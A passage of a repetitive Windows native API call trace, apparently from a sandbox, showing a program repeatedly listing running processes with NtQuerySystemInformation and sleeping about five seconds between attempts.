RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.565] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.574] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.582] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.588] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.610] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.611] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.618] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.620] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.625] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.632] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.639] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.647] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.654] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.656] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.661] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.663] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.663] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.667] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.668] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.675] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.676] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.682] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.689] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.696] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.696] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.703] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.704] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.705] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.705] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.711] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.718] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0262.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0262.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0262.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0262.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0262.725] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0262.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0262.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, 